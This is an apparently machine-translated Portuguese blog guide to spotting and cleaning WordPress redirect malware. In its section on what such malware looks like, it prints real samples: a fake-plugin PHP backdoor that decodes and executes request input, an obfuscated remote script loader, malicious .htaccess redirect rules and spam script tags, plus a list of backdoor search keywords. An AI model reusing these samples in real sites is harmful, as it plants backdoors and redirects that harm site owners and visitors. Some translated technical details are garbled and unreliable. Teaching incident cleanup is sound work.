Hack de redirecionamento do WordPress? Como limpar um site?
· Время на чтение: 27mínimo · por · Publicados · AtualizadaRedirecionamento malicioso do WordPress. Se o seu site WordPress ou painel de administração redireciona automaticamente para um site de spam, seu site provavelmente foi hackeado e infectado com malware de redirecionamento. Então, o que você pode fazer com um malware de redirecionamento hackeado do WordPress em seu site? Antes de mais nada, confirme se você tem um hack escaneando seu site.
É importante lembrar que o tempo é seu melhor amigo aqui. Não perca tempo se preocupando com isso. Corrigiremos completamente o hack e seu site poderá ser limpo. Mas você precisa agir rápido.
Vou orientá-lo pelas etapas para ajudá-lo a remover redirecionamentos maliciosos de seu site, corrigi-lo e garantir que isso não aconteça novamente. Com várias variações do hack de redirecionamento do WordPress, pode ser complicado chegar à raiz dele. Este artigo irá ajudá-lo a encontrar e remover malware passo a passo rapidamente.
O conteúdo do artigo:
- O que significa um redirecionamento hackeado (redirecionamento malicioso) no WordPress?
- Como sei se meu site WordPress está sendo redirecionado para spam?
- Como remover a infecção de redirecionamento hackeado do WordPress?
- O site está sendo redirecionado para spam: como isso afetou meu site?
- Como evitar hacks de redirecionamento do WordPress no futuro?
- Quais são as consequências dos redirecionamentos maliciosos?
- Conclusão
O que significa um redirecionamento hackeado (redirecionamento malicioso) no WordPress?
Redirecionamento hackeado O WordPress acontece quando um código malicioso é injetado em seu site, que redireciona automaticamente seus visitantes para outro site. Normalmente, o site de destino contém spam, produtos farmacêuticos do mercado cinza ou serviços ilegais.
Existem muitos tipos de malware, como o malware favicon, que causam esse comportamento, portanto, o hack de redirecionamento de malware do WordPress é um termo genérico que se refere ao sintoma predominante: redirecionamentos maliciosos.
Esse tipo de hack afeta milhões de sites e resulta em perdas terríveis todos os dias. Os sites estão perdendo receita, marca e classificações de SEO, sem mencionar o estresse da recuperação.
No entanto, a pior coisa sobre o hacking é que ele continua piorando. O malware se espalha por arquivos e pastas e até mesmo pelo banco de dados do seu site, copiando a si mesmo e usando seu site para infectar outras pessoas.
Abordarei as consequências específicas de um hack posteriormente neste artigo, mas basta dizer que sua prioridade para salvar seu site é agir imediatamente e não procrastinar.
Como sei se meu site WordPress está sendo redirecionado para spam?
Antes de corrigir o problema com redirecionando um site WordPress invadido, precisamos primeiro estabelecer que seu site foi definitivamente invadido. Tal como acontece com a infecção, os hacks apresentam sintomas. E então, uma vez identificados os sintomas, você pode confirmar o diagnóstico com alguns testes.
Como afirmado anteriormente, os redirecionamentos automáticos são um sinal claro de um hack de redirecionamento do WordPress. Os redirecionamentos de spam podem ocorrer nos resultados da pesquisa, em páginas específicas ou até mesmo quando você tenta fazer login no seu site. O problema com redirecionamentos é que eles nem sempre acontecem de forma consistente ou confiável.
Por exemplo, se você acessou seu site e ele foi redirecionado, isso pode não acontecer na segunda, terceira ou quarta vez. Os hackers são inteligentes e configuram um cookie para garantir que o problema ocorra apenas uma vez.
O resultado disso é que é fácil cair em uma falsa sensação de segurança quando você sente que pode ser um acidente. Há uma pequena chance de que isso seja um bug no código, mas quando digo "pequeno", quero dizer uma chance infinitesimal.
Verifique se há sinais de um redirecionamento invadido no WordPress
Via de regra, os hacks se manifestam de maneiras diferentes. Individualmente, podem ser erros do site, como um código de rastreamento antigo, mas se você vir dois ou mais desses sintomas em seu site, pode ter certeza de que seu site foi invadido.
- O site WordPress redireciona para um site de spam: Um sintoma clássico de um hack de redirecionamento do WordPress. Dependendo da variante do malware, o redirecionamento pode ocorrer de maneiras diferentes ou em locais diferentes do seu site.
— Redirecionamentos automáticos: o malware redireciona seus visitantes automaticamente para sites de spam quando alguém visita seu site. Isso também acontece se alguém visitar seu site do Google ou Yandex. Normalmente, você também será redirecionado se tentar fazer login em seu site.
— Redirecionamento de links: alguém clica em um link e é redirecionado para outro site. Isso é especialmente inteligente porque os visitantes clicam nos links esperando ser redirecionados para outro local de qualquer maneira.
— Redirecionamentos apenas para dispositivos móveis: Somente se o seu site for acessado por meio de um dispositivo móvel, ele será redirecionado. - Os resultados do Google mostram a mensagem "O site pode ter sido invadido": quando seu site aparece nos resultados de pesquisa, aparece uma pequena mensagem: "Site may have been hacked" - aparecerá logo abaixo do título. Esta é a maneira do Google de alertar os visitantes sobre um site potencialmente invadido.
- Lista negra do Google: A maior bandeira vermelha de todas - literalmente - a lista negra do Google é um sinal claro de que seu site foi invadido. Mesmo que seus visitantes estejam usando um mecanismo de pesquisa diferente, eles também estão usando a lista negra do Google para sinalizar sites invadidos.
- Proibição do site no Yandex: também um sinal claro de um site invadido, as posições do seu site aparecerão nos resultados de pesquisa do Yandex. Talvez a página principal permaneça, mas isso não é um fato.
- O Google Ads sinaliza scripts em seu site: se você tentar anunciar em seu site, o Google Ads rastreará seu site e avisará sobre cenários de redirecionamento em suas postagens ou páginas.
- O host da web suspendeu sua conta: sites suspendem sites por vários motivos, e o malware é um dos principais. Se você vir esta mensagem quando estiver tentando acessar seu site, verifique seu e-mail por algum motivo. Como alternativa, entre em contato com a equipe de suporte.
- As pessoas estão reclamando do seu site: A parte terrível dos hacks é que os administradores do site geralmente são os últimos a saber sobre um hack, a menos que tenham um bom plug-in de segurança instalado. Muitas pessoas descobrem isso porque os visitantes e usuários do site reclamam que o site está sendo redirecionado para spam ou até mesmo recebendo lixo eletrônico.
Se você observar algum dos sintomas listados acima, é uma boa ideia anotar as informações sobre ele. Qual navegador você usou? Qual aparelho você usou? Essas informações podem ajudar a identificar o tipo de malware de hacking do WordPress que você está enfrentando e, portanto, eliminá-lo mais rapidamente.
Confirme se o seu site está infectado com um hack de redirecionamento
O próximo passo para descobrir o sintoma é certificar-se de que é realmente um hack. A maneira mais rápida de garantir que seu site seja suscetível a redirecionamentos maliciosos é verificar seu site.
1. Examine seu site com um plug-in de segurança
Se você ainda não tiver certeza em 100 % de que seu site foi hackeado, use um scanner online gratuito para confirmar. Um caso muito comum é acessar seu site a partir de um dispositivo móvel, o que indica malware no arquivo .htaccess. Ou um que vemos com frequência é um hack de página que redireciona automaticamente. Isso acontece quando há malware no banco de dados.
Mais adiante neste artigo, veremos outras variantes de malware. Agora, quero enfatizar que o malware direto sequestrado pelo WordPress pode estar em quase qualquer lugar do seu site.
Por causa disso, cada scanner irá marcá-lo de forma diferente. Por exemplo, Quttera sinalizará malware da seguinte forma:
Nome da ameaça: Heur AlienFile gen
E o WordFence mostrará um aviso sobre um monte de arquivos desconhecidos, como este:
* Arquivo desconhecido no núcleo do WordPress: wp-admin/css/colors/blue/php.ini
* Arquivo desconhecido no núcleo do WordPress: wp-admin/css/colors/coffee/php.ini
* Arquivo desconhecido no núcleo do WordPress: wp-admin /css/colors/ectoplasm/php.ini
Esses são bons sinais de que seu site foi invadido porque, como veremos mais adiante, a pasta /wp-admin não deve conter nada além dos arquivos principais da instalação do WordPress.
Dito isto, infelizmente não ajuda na desinstalação. Existem vários problemas importantes em como outros plug-ins de segurança sinalizam malware devido a seus mecanismos de detecção. Existem muitos falsos positivos, arquivos ausentes e muitos outros problemas. Seu site é importante, então escolha seu plugin de segurança com sabedoria.
2. Digitalize com um scanner de segurança online
Você também pode usar um scanner de segurança online como o Sucuri SiteCheck para verificar se há malware de redirecionamento hackeado. Um scanner de segurança online ou um scanner externo verifica o código em suas páginas e postagens em busca de scripts maliciosos.
O único problema com um scanner front-end é que ele pode e só irá escanear o código ao qual tem acesso. Ou seja, basicamente o código fonte das páginas e posts. Embora existam muitos malwares de redirecionamento hackeados nessas páginas, existem algumas opções nos arquivos principais. O scanner externo não os mostrará.
Aconselho o uso de um scanner de segurança online como ferramenta de diagnóstico de primeira linha. Se for positivo, você pode ter certeza de que é positivo e trabalhar para consertar o hack. Se for negativo, você pode verificar manualmente os locais não digitalizados pelo scanner frontal. Desta forma, você pode eliminar parte do trabalho manual.
3. Examine manualmente o site em busca de malware
Se você estiver usando um plug-in de segurança para procurar malware de redirecionamento hackeado, pode pular esta seção completamente. Um bom plugin de segurança fará exatamente o que eu sugiro abaixo, mas muito mais rápido e melhor.
Escanear seu site em busca de malware significa essencialmente procurar códigos indesejados em arquivos e banco de dados. Entendo que "código lixo" é inútil como referência, mas devido às opções, não há uma única linha que você possa encontrar rapidamente e anunciar um hack.
No entanto, na próxima seção, listei alguns exemplos de malware encontrados em outros sites. E na próxima seção, falaremos sobre locais típicos onde o malware é injetado, dependendo do comportamento de redirecionamento observado.
Como é o malware de redirecionamento do WordPress
Estou exagerando nessa linha neste artigo, mas o malware de redirecionamento de hack do WordPress tem muitas opções e, portanto, não há um único trecho de código padrão para apontar, "Procure por isso!"
No entanto, posso dar uma ideia de como são alguns códigos maliciosos:
- O código pode estar em algum lugar no cabeçalho da página ou em todas as páginas da tabela wp_posts. aqui estão alguns exemplos:
type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&ver=5.7.2' id='hello_newscript5-js'> type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'> type='text/javascript' async src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'> type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'> type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'> src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'>
- As tabelas wp_options podem ter URLs desconhecidos no site_url. aqui estão alguns exemplos:
stat/traksatiticss dest/colecfattracks gotosecnd ws.stienernando
- Os scripts também podem ser ofuscados, o que significa que você precisa executá-los por meio de um desofuscador online para extrair o código real.
código ofuscado
eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,1 09,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115 ,99,114,105,112,116, 39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115, 99,114,105,112,116,39 ,59,10,32,32,32,32,112,111 ,46,115,114, 99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,11 5,115,46,103, 97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32 ,32,118, 97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97 ,103,78,9 7,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10, 32,32, 32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44 ,32,115 ,41,59,10,32,32,125,41,40,41,59));')
E o que isso realmente significa:
(function() var po = document.createElement('script'); po.type = 'text/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('script') [0];s.parentNode.insertBefore(po, s); )();
- Plugins falsos podem ter arquivos assim quando abertos:
<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo ' '; } add_action( 'admin_head', 'my_custom_js' ); add_action('wp_head', 'my_custom_js');
- Redirecionamentos móveis indicam alterações no arquivo .htaccess. O código abaixo redireciona para https://daily-prize-best /life/?u=y2ykaew&o=2xup89r&m=1&t=mns2.
RewriteEngine On RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https:/ /bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm[L] RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php[L]
Locais para procurar malware redirecionado
O WordPress é dividido em duas partes principais: arquivos e banco de dados. O problema com o malware de redirecionamento hackeado é que ele pode estar em qualquer lugar.
Se você estiver familiarizado com a modificação do código do seu site, poderá encontrar o código de redirecionamento que mencionei nos locais a seguir. Baixe uma cópia de backup do seu site - arquivos e banco de dados - para procurar complementos suspeitos.
Novamente, lembre-se de que existem opções como redirecionamentos clássicos, situacionais, específicos do dispositivo ou até mesmo agrupados. O código será diferente para cada um, assim como a localização.
A. Arquivos do site
- Arquivos principais do WordPressR: Começando com os mais simples, /wp-admin e /wp-includes não devem ser diferentes de uma nova instalação do WordPress. O mesmo vale para os arquivos index.php, settings.php e load.php. Estes são os arquivos principais do WordPress e as configurações não fazem nenhuma alteração neles. Compare com uma nova instalação do WordPress para ver se há alguma alteração. O arquivo .htaccess é um caso especial. Um hack de redirecionamento móvel quase sempre aparecerá neste arquivo. Procure a regra do agente do usuário que define o comportamento específico do dispositivo e verifique o script de redirecionamento.
- Arquivos de Tema Ativo: Se você tiver mais de um tema instalado (o que não é recomendado para começar), verifique se apenas um deles está ativo. Em seguida, revise seus arquivos de tema ativo, como header.php, footer.php e functions.php, em busca de códigos estranhos. Uma boa maneira de testar isso é baixar as instalações originais dos sites dos desenvolvedores e comparar o código com esses arquivos. Normalmente, esses arquivos precisam estar em um formato específico, e é por isso que o código lixo se destaca. Lembre-se de que as configurações também alterarão o código. Além disso, se você estiver usando temas ou plug-ins nulos, pode interromper o diagnóstico aqui, pois podemos garantir que você foi invadido por causa deles.
- Plugins falsos em seu site: Sim, este é o caso. Os hackers mascaram o malware, tornando-o o mais legítimo possível. Vá para a pasta wp-content/plugins e dê uma olhada. Algo que você não instalou? Algumas duplicatas estranhas? Algum deles tem apenas um ou dois arquivos em suas pastas?
aqui estão alguns exemplos:
/wp-content/plugins/mplugin/mplugin.php /wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php
Se você tiver muitos plugins instalados, pode ser difícil verificar todos eles. A regra geral para detectar plug-ins falsos é que, por convenção, nomes de plug-in legítimos raramente começam com letra maiúscula e seus nomes não contêm nenhum caractere especial além de hífens. Estas não são regras, mas convenções. Portanto, não dê muita importância a eles para identificar definitivamente as falsificações. Se você suspeitar que um plug-in é falso, pesquise no Google e encontre a versão original no repositório do WordPress. Baixe-o de lá e verifique se os arquivos correspondem.
B. Banco de dados
- tabela wp_posts: scripts maliciosos geralmente estão presentes em todas as páginas. Mas, como já dissemos, os hackers são muito astutos. Confira uma boa amostra de postagens antes de decidir que um hack não existe. Outra forma de verificar o código de suas páginas e postagens é verificar o código-fonte da página usando um navegador. Cada página do seu site tem um código HTML que pode ser lido pelos navegadores. Abra o código-fonte da página e verifique o cabeçalho, o rodapé e tudo entre as tags de script em busca de coisas que pareçam fora do lugar. A seção de cabeçalho contém informações que o navegador usa para carregar a página, mas não é mostrada ao visitante. Os scripts de malware geralmente ficam ocultos aqui, então eles carregam antes do resto da página.
- tabela wp_options: verifique siteurl. Este deve ser o URL do seu site nos casos 99%. Se não, este é o seu hack aqui.
No entanto, agora não é hora de tentar remover nada. Você deve ter certeza absoluta de que os scripts Javascript ou PHP são definitivamente maliciosos. Você deseja se livrar do malware muito rapidamente, mas a pressa o levará a um site que está fora do ar.
Outras maneiras de verificar redirecionamentos de malware
Você pode não ver todos os sintomas listados acima como administrador do site. Os hackers excluem habilmente seu IP e conta de visualizar os resultados de um hack porque eles querem permanecer indetectáveis pelo maior tempo possível.
Além disso, você pode ver o sintoma uma vez e não conseguir recriá-lo. Tudo isso é muito confuso. Existem várias outras maneiras de verificar os sintomas, caso você não os veja diretamente em seu site.
- Verifique o console de pesquisa do Google: eles sinalizarão a infecção por malware na seção Problemas de segurança.
- Use um navegador anônimo para acessar seu sitepara ver o que um visitante regular vê
- Verifique os logs de atividades em busca de atividades incomuns do usuário, como elevar privilégios de usuário ou redigir mensagens.
A próxima seção trata exclusivamente da exclusão. Respire fundo e tome uma xícara de chá ou café. Vamos passar por todo o processo juntos.
Como remover a infecção de redirecionamento hackeado do WordPress?
Agora que sabemos que seu site está redirecionando para outro site, você precisa agir rapidamente. Com o passar do tempo, o número de hacks aumenta exponencialmente porque o malware se espalha para mais arquivos e pastas em seu site. Isso não apenas aumenta o dano, mas também torna a recuperação muito mais difícil.
Estou assumindo que você já rastreou seu site antes de chegar a esta seção. No entanto, se ainda não o fez, a primeira coisa a fazer é rastrear seu site.
Existem 2 maneiras principais de remover redirecionamentos maliciosos do seu site. Eu recomendo usar o plug-in de segurança, pois vi em primeira mão os danos que os hackers podem causar a um site.
1. (RECOMENDADO) Use um plug-in de segurança para remover o vírus de redirecionamento
Os plug-ins de segurança são usados para remover malwares difíceis de detectar. Tudo o que você precisa fazer é instalar o plug-in em seu site e aguardar alguns minutos para que seu site seja restaurado.
Se você usou um scanner para confirmar que seu site foi invadido, tudo o que você precisa fazer é atualizá-lo e recuperar seu site.
Existem várias razões pelas quais é recomendável usar esses plugins:
- Remova apenas malware e deixe seu site intacto;
- Encontre backdoors que os hackers deixam para reinfecção e também os remova;
- Firewall integrado para proteger seu site de tráfego malicioso.
Se você não pode acessar o wp-admin
Nesse caso, entre em contato com o serviço de remoção de malware de emergência para obter ajuda. Um especialista em segurança dedicado limpará rapidamente seu site e garantirá que ele volte a funcionar rapidamente.
2. Remova manualmente o malware de redirecionamento do WordPress
É possível remover o malware de redirecionamento manual do seu site, mas há pré-requisitos para isso.
- Primeiro, você precisa saber como o WordPress está configurado. Desde a aparência dos arquivos principais até as pastas e arquivos que cada plug-in e tema cria para trabalhar. A exclusão de um arquivo necessário pode travar seu site, portanto, seu site não é apenas invadido, mas também desativado.
- Em segundo lugar, você deve ser capaz de distinguir o código bom do ruim, ou seja, malware. O código malicioso é disfarçado como código legítimo ou ofuscado para que não possa ser lido. É muito difícil distinguir um código bom de um código ruim, e é por isso que muitos scanners sofrem com falsos positivos.
ObservaçãoR: Você pode contratar um especialista em WordPress para remover malware. Lembre-se de que os especialistas em segurança são caros e levarão tempo para remover um hack.
Além disso, eles não garantem que você não recairá. No entanto, ainda recomendo esse curso de ação em vez de tentar remover o malware manualmente.
Ok, essas são as ressalvas. Aqui estão as etapas para remover o malware de redirecionamento do seu site:
1. Faça backup do seu site
Certifique-se de fazer um backup antes de fazer qualquer coisa. Mesmo que o site seja invadido, ele ainda funciona. Portanto, se algo der errado durante o processo de remoção do malware, você terá um backup para o qual voltar. Um site invadido é difícil de limpar. Um site quebrado é ainda mais difícil de limpar e, às vezes, impossível de recuperar.
O host da web pode suspender seu site ou até mesmo removê-lo. Então, obter acesso ao seu site, mesmo para raspá-lo, é um grande problema. Você precisará entrar em contato com a equipe de suporte do host da web para acessar o site suspenso, mas um site excluído não pode ser feito sem um backup.
2. Baixe uma versão limpa do WordPress
Baixe novas instalações do WordPress, bem como quaisquer plugins e temas que você usa. As versões devem corresponder ao que está em seu site.
Depois de baixá-los, você pode usar os arquivos em branco para comparar com os arquivos do seu site. Você pode usar o verificador de diferenças online para encontrar as diferenças, porque certamente não recomendamos procurá-las manualmente.
Essencialmente, isso é correspondência de assinatura, que é o que a maioria dos scanners de segurança faz. No entanto, pelo menos agora você sabe quais arquivos e pastas são necessários para que seu site funcione corretamente. Não apague nada nesta fase. Você acabou de definir a linha de base para entender quais arquivos são necessários.
3. Procure e remova o malware de redirecionamento
Esta é talvez a etapa mais difícil do processo. Como eu disse, você precisa ser capaz de distinguir um código bom de um código ruim e, em seguida, removê-lo ou substituí-lo conforme necessário.
Limpe os principais arquivos do WordPress
É extremamente importante obter a mesma versão do WordPress do seu site, caso contrário, você pode sofrer uma falha no site. Uma vez carregado, use cPanel ou FTP para acessar os arquivos do seu site e substitua as seguintes pastas:
/wp-admin
— /wp-enables
Essas pastas são usadas pelo WordPress para executar e carregar seu site e não se destinam a armazenar conteúdo do usuário. Essa foi a parte fácil. Agora verifique os seguintes arquivos em busca de códigos estranhos:
- index.php
wp-config.php
wp-settings.php
- wp-load.php
- .htaccess
Além disso, não deve haver scripts PHP na pasta /wp-uploads. Eu percebo que "código estranho" é muito vago, mas como dissemos antes, um malware de redirecionamento hackeado do WordPress tem muitas, muitas opções.
Como tal, não posso dizer exatamente qual código você verá em qualquer um desses arquivos. Se você entender como o código funciona, pode consultar a lista de arquivos do WordPress para entender o que cada um faz e ver se algum código faz algo diferente. Quando tiver certeza de que encontrou esse código, exclua-o.
Limpe temas e plugins de malware
Todos os arquivos e pastas associados ao tema e plugin são armazenados na pasta /wp-content. Você pode verificar cada um dos arquivos do seu site para ver onde há uma diferença no código.
Uma palavra de cautela aqui: nem toda mudança é ruim. Se você personalizou algum de seus plugins ou temas - o que provavelmente você fez - haverá diferenças em relação a uma instalação limpa. Se você não se importa em perder essas configurações, pode prosseguir e substituir os arquivos em massa.
Você provavelmente vai querer manter o trabalho que fez, então comece a olhar para cada uma das diferenças com cuidado. Se você puder seguir a lógica do código, poderá entender como os arquivos interagem entre si e com o restante do site. Isso deve permitir que você encontre o malware e o remova.
Se você tiver um número significativo de temas e plugins, isso pode ser uma tarefa assustadora. Aqui estão alguns bons lugares para começar:
- Arquivos de Tema Ativo
header.php
rodapé.php
funções.php - Plug-ins vulneráveis
- Alguém foi hackeado recentemente
- Existe algum não atualizado - plugins falsos
- Poucos arquivos
- Duplicatas óbvias
Alguns arquivos maliciosos parecem inofensivos e muitas vezes imitam nomes de arquivos reais. É aqui que as instalações limpas são úteis, mas também entre em contato com os desenvolvedores do plug-in e do tema para obter suporte, se você não tiver certeza.
Remover malware do banco de dados do WordPress
Use phpMyAdmin para carregar o banco de dados para limpar. Em seguida, verifique as tabelas em busca de conteúdo suspeito, como URLs de spam ou palavras-chave. Remova este conteúdo com cuidado, certificando-se de que é um código ruim e não um código bom modificado.
Verifique as seguintes tabelas em particular:
- wp_options
- wp_posts
Dependendo do tamanho do seu site, isso pode levar um tempo significativo. Geralmente, se o malware estiver na sua tabela wp_posts, ele estará em todas as postagens. Se você tem centenas de postagens com muito conteúdo, é uma tarefa monumental limpá-las manualmente.
No entanto, depois de identificar o script de malware, você pode usar o SQL (ou pedir a alguém que entenda de SQL) para remover o script de cada mensagem. A ressalva aqui é que você não pode ter certeza de que este é o único malware na mesa.
Além disso, especialmente com sites de comércio eletrônico, verifique novamente se você está removendo informações importantes do usuário ou do pedido.
4. Remova as portas traseiras
Agora que você limpou seu site de malware, verifique se há backdoors. Esses são os pontos de entrada para o seu site que um hacker deixa para trás para que possam infectar novamente seu site se o hack original for descoberto.
Backdoors podem estar em vários lugares. Algum código para pesquisar:
- nota
- base64_decode
- gzinflate
- preg_replace
- str_rot13
Uma palavra de cautela: eles não são necessariamente ruins. Estes são scripts PHP legítimos que podem ser levemente modificados para servir como backdoors. Tenha cuidado ao remover qualquer um sem uma análise adequada.
5. Recarregue os arquivos limpos
Agora que você removeu o hack, você precisa colocar seu site de volta no lugar. Use um gerenciador de arquivos para reenviar arquivos e phpMyAdmin no cPanel ou VestaCP para substituir seu site.
Isso é muito semelhante a como você restaura manualmente um backup e significa que primeiro você deve excluir os arquivos e o banco de dados existentes. Se você acidentalmente pulou a etapa de backup no início, faça-o agora. Fazer backup do seu site, mesmo um hackeado, evitará que você sofra se algo der errado.
6. Limpe o cache do site
Agora que seu site limpo está carregado, limpe seu cache. O cache armazena versões anteriores de suas páginas e conteúdo e as mostra aos visitantes do site. Para que seu site recém-limpo se comporte conforme o esperado, você precisa limpar o cache.
7. Verifique cada um dos plugins e temas
O triste fato sobre o malware é que ele pode se esconder em quase qualquer lugar. Como você gastou todo esse tempo e energia limpando manualmente seu site, vale a pena dedicar alguns minutos extras para garantir que seus esforços sejam bem-sucedidos.
Eu recomendo que você use o FTP para isso, pois exigirá muito trabalho para alterar os arquivos do site.
- Desative todos os seus plugins e temas renomeando a pasta wp_contents para outra coisa.
- Em seguida, ative-os um por um, sempre verificando se há um redirecionamento em seu site.
- Se não houver problemas, você sabe que os plugins e temas não contêm malware.
Por que eu desaconselho a remoção manual de redirecionamentos de hackers
Você deve estar se perguntando por que não recomendo excluir hacks dessa maneira. Pense em hacks da mesma forma que pensaria em uma doença, como câncer ou um osso quebrado.
Você prefere deixar o cuidado dessas doenças para médicos que são profissionais treinados com ampla experiência em tratá-los. Pessoas não treinadas fazem mais mal do que bem. Pergunte a qualquer médico que tenha lidado com uma fratura óssea mal consolidada.
Existem algumas coisas que podem dar errado ao remover manualmente um hack:
- O software malicioso pode se espalhar para lugares inesperados e é difícil de remover sem erros.
- A remoção de malware por si só não é suficiente se as vulnerabilidades e/ou backdoors não forem corrigidos.
- Às vezes, a exclusão inadequada pode danificar outras partes do site.
- Sites grandes (por exemplo, lojas de comércio eletrônico) serão muito difíceis e demorados para acessar manualmente.
- O tempo é essencial, pois os hacks pioram exponencialmente com o tempo.
- Pode não conseguir acessar seu site se o host tiver banido sua conta
Simplificando, há uma enorme margem de erro em um site invadido. Existe um perigo muito real de sair deste processo em uma posição pior do que você começou. É melhor usar um bom plug-in de segurança para remover scripts de hackers.
O site está sendo redirecionado para spam: como isso afetou meu site?
Os sites são misturas complexas de software e, em sua essência, nenhum software no 100% pode ser hackeado. Essa é a realidade de qualquer software, desde os jogos de 8 bits de antigamente até os enormes sistemas de informações gerenciais usados pelos bancos.
Sites WordPress não são diferentes. Embora os arquivos principais do WordPress estejam mais próximos de serem à prova de balas, o mesmo não pode ser dito para plugins e temas. Plugins e temas adicionam elementos dinâmicos, funcionalidade e design a sites, e um site sem eles seria seguro, mas também estático e chato.
Aqui está uma lista de razões pelas quais os sites WordPress são invadidos:
- Vulnerabilidades em plugins e temas;
- Senhas incorretas e contas de usuário comprometidas;
- Backdoors em temas nulled e plugins;
- ataques de script XSS;
- Ataques de força bruta com bots.
Como afirmado anteriormente, a segurança do site não deve ser menosprezada. Agora você tem experiência em primeira mão de como é difícil consertar um hack, então, idealmente, você deve ter uma estratégia para garantir que isso não aconteça novamente.
Como evitar hacks de redirecionamento do WordPress no futuro?
Agora que você tem um site limpo, os próximos passos são evitar que seu site WordPress seja redirecionado para spam.
Hacks são repetidos o tempo todo. Isso se deve principalmente ao fato de que o motivo pelo qual seu site foi invadido não foi corrigido. Para evitar a recorrência, os seguintes passos devem ser seguidos:
1. Instale o plug-in de segurança: escolha um bom plug-in de segurança que possa escanear, limpar e prevenir hacks. Esses plug-ins têm um firewall integrado que bloqueia proativamente o tráfego nocivo de chegar ao seu site.
2. Alterar todas as senhas de usuários e banco de dados: contas de usuário comprometidas e senhas facilmente adivinhadas são o segundo motivo para hacks de sites.
3. Redefinir e verificar contas de usuário: verifique as contas de usuário com acesso de administrador desnecessário e remova-as.
4. Alterar funções + chaves de segurança: funções e chaves de segurança são strings longas que o WordPress anexa aos dados de login do cookie para ajudar os usuários a permanecerem conectados com segurança. Você pode alterá-los em seu arquivo wp-config.php depois de usar o gerador WordPress para obter novos.
5. Certifique-se de usar apenas plugins e temas comprovados: Eu já disse isso antes, mas vale a pena repetir. Use apenas plugins e temas de desenvolvedores confiáveis. Esses desenvolvedores fornecerão suporte e atualizações extremamente importantes para a segurança. Sob nenhuma circunstância você deve usar temas e plugins vazios. O que quer que você salve, você perderá muitas vezes devido ao hack inevitável.
6. Certifique-se de ter SSLR: O ideal é que você já tenha SSL em seu site, mas o incluímos para fins de integridade. O SSL garante que a comunicação de e para o site seja criptografada. O Google também está pressionando fortemente essa mudança e você logo começará a ver penalidades de SEO, se ainda não o fez, se o SSL não estiver ativado em seu site.
7. Proteja o WordPress: Existem medidas de reforço de segurança comumente conhecidas como endurecimento do WordPress. Gostaria de alertar para não esquecer de seguir as dicas bacanas disponíveis na internet. Alguns deles não funcionam e afetarão o site e a experiência do visitante.
8. Tenha um plano/ações de segurança a serem realizadas regularmente: não basta fazer uma coisa só uma vez e esquecer. No mínimo, verifique os usuários regularmente e exija redefinições de senha. Definir um registro de atividades também é uma boa ideia, pois facilita e agiliza o rastreamento da atividade do usuário, que geralmente pode ser um sinal de alerta precoce de um site invadido.
9. Você também precisa atualizar tudo.R: WordPress, plugins e temas, e faça backups regulares.
Quais são as consequências dos redirecionamentos maliciosos?
Qualquer hack tem um efeito terrível em um site, e o malware de redirecionamento do WordPress não é diferente. Aqui estão apenas algumas das maneiras pelas quais o malware pode impactar negativamente seu site e negócios:
- Perda de rendase você tiver um site de comércio eletrônico ou um site de negócios.
- Perda de valor da marca devido ao redirecionamento de visitantes para sites ilegais, fraudulentos ou spam.
- Impacto no SEOporque o Google penaliza sites invadidos em suas listas e sinaliza um site invadido para que os visitantes geralmente tenham medo de visitá-lo.
- Violação de dados seus visitantes e seu site.
Existem muitas outras maneiras pelas quais o hacking pode causar danos à propriedade. O fator crítico é agir rapidamente e se livrar do malware o mais rápido possível.
Conclusão
O malware de hack de redirecionamento do WordPress aparece em um novo avatar de tempos em tempos. Os hackers e, portanto, seus malwares estão ficando cada vez mais inteligentes. Os sites do WordPress são um tesouro para eles e a única maneira de vencê-los é ficar à frente do jogo.
A melhor maneira de proteger seu site WordPress é instalar um bom plug-in de segurança que também vem com um firewall integrado. Este é, sem dúvida, o melhor investimento na segurança do seu site.
Lendo este artigo:
- WordPress - como encontrar e remover um link de spam em um site?
- Como reduzir o spam de formulário de contato no WordPress
Obrigado por ler: AJUDANTE DE SEO | NICOLA.TOP